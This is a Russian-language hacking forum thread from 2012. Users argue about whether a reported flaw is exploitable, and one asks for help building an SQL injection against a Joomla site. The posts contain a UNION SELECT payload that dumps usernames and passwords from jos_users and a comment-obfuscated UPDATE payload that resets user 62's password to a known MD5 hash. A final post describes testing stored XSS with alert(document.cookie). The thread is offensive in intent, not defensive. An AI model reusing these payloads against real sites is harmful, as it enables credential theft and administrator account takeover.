24.04.2012, 10:56
|
|
Новичок
Регистрация: 01.04.2011
Сообщений: 13
С нами:
7955606
Репутация:
0
|
|
Сообщение от faza02
как это так «дела не меняет?».
в том смысле, что это нельзя эксплуатировать, и быть может это вообще не уязвимость
|
|
|
24.04.2012, 11:34
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от Mihailov Alx
Mihailov Alx said:
в том смысле, что это нельзя эксплуатировать, и быть может это вообще не уязвимость
наркоман шоле? Serafim белым по русски написал вроде:
/showpost.php?p=3117961&postcount=20488
|
|
|
|
24.04.2012, 11:49
|
|
Новичок
Регистрация: 01.04.2011
Сообщений: 13
С нами:
7955606
Репутация:
0
|
|
Сообщение от d1v
наркоман шоле?
Serafim
белым по русски написал вроде:
/showpost.php?p=3117961&postcount=20488
Будучи новичком в этом, не зря попросил разъяснения. То, что вы молчите и смотрите свысока не делает вас умнее. Я к примеру, когда понимаю в какой-то области - помогаю, если вижу что человек тупит - не скатываюсь до уровня скотины с оскорблениями, для меня лучше пройти мимо. И то, подобное редкость, в основном подаю руку.
|
|
|
|
24.04.2012, 11:53
|
|
Banned
Регистрация: 27.05.2009
Сообщений: 17
С нами:
8924963
Репутация:
75
|
|
Сообщение от Mihailov Alx
Mihailov Alx said:
Будучи новичком в этом, не зря попросил разъяснения. То, что вы молчите и смотрите свысока не делает вас умнее. Я к примеру, когда понимаю в какой-то области - помогаю, если вижу что человек тупит - не скатываюсь до уровня скотины с оскорблениями, для меня лучше пройти мимо. И то, подобное редкость, в основном подаю руку.
Согласен
|
|
|
|
24.04.2012, 11:56
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от Mihailov Alx
Mihailov Alx said:
Будучи новичком в этом, не зря попросил разъяснения. То, что вы молчите и смотрите свысока не делает вас умнее. Я к примеру, когда понимаю в какой-то области - помогаю, если вижу что человек тупит - не скатываюсь до уровня скотины с оскорблениями, для меня лучше пройти мимо. И то, подобное редкость, в основном подаю руку.
какие оскорбления? ты на прошлой странице написал, что нет ни единого намёка в исходном коде, если ты туда смотрел - ты не мог не заметить вывода. и кто тебе сказал, что тебе обязаны разжёвывать и класть в рот? твоя невнимательность - это только твоя проблема.
|
|
|
|
24.04.2012, 12:08
|
|
Новичок
Регистрация: 01.04.2011
Сообщений: 13
С нами:
7955606
Репутация:
0
|
|
Сейчас я понял откуда пошло недопонимание - я использую Google Chrome и поведение кодировок в ссылках там несколько иное, нежели в FF. Соответственно и результат иной. Если бы я раньше это узрел, то не просил пояснений.
|
|
|
|
24.04.2012, 12:10
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от Mihailov Alx
Mihailov Alx said:
Сейчас я понял откуда пошло недопонимание - я использую Google Chrome и поведение кодировок в ссылках там несколько иное, нежели в FF. Соответственно и результат иной. Если бы я раньше это узрел, то не просил пояснений.
во всех браузерах всё выводится совершенно одинаково.
|
|
|
|
24.04.2012, 13:47
|
|
Новичок
Регистрация: 01.04.2011
Сообщений: 13
С нами:
7955606
Репутация:
0
|
|
Я сейчас через Canary сижу, ну ладно, суть не в этом.
как я понимаю запрос выглядит так ( синтаксис скорее всего в корне неправильный)
UNION SELECT group_concat(`username`,`password`),2,3,4
FROM `jos_users`
если выполнять
SET password='21232f297a57a5a743894a0e4a801fc3'
WHERE id = 62;
то это должно выглядеть так:
/**/update/**/jos_users/**/SET/**/password='21232f297a57a5a743894a0e4a801fc3'/WHERE/**/id=62
Поправьте
|
|
|
|
24.04.2012, 13:55
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Сообщение от Mihailov Alx
Mihailov Alx said:
Я сейчас через Canary сижу, ну ладно, суть не в этом.
как я понимаю запрос выглядит так ( синтаксис скорее всего в корне неправильный)
UNION SELECT group_concat(`username`,`password`),2,3,4
FROM `jos_users`
если выполнять
SET password='21232f297a57a5a743894a0e4a801fc3'
WHERE id = 62;
то это должно выглядеть так:
/**/update/**/jos_users/**/SET/**/password='21232f297a57a5a743894a0e4a801fc3'/WHERE/**/id=62
Поправьте
http://forum.antichat.net/thread104591.html
|
|
|
|
25.04.2012, 08:46
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Есть xss на одном ресурсе, не получается определить тип.
Создаю новость, вписываю в тело страницы
Сообщение от None
alert(document.cookie)
При обновлении, вылетает пустой алерт. В исходнике не отображается вписанный код. Первая мысль, что это DOM-BASED, но вся соль в том, что я ява-скрипт не вписываю через адресную строку, следовательно мой код где-то сохраняется, но когда после вылета алерта открываю исходник, то эксплойта нет!
не подскажите, что за бред с xss?) |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [ Dumi ]](/avatars/avatar86467.jpg?3118500){kind=avatar}
Похожие темы
Комбинированный вид
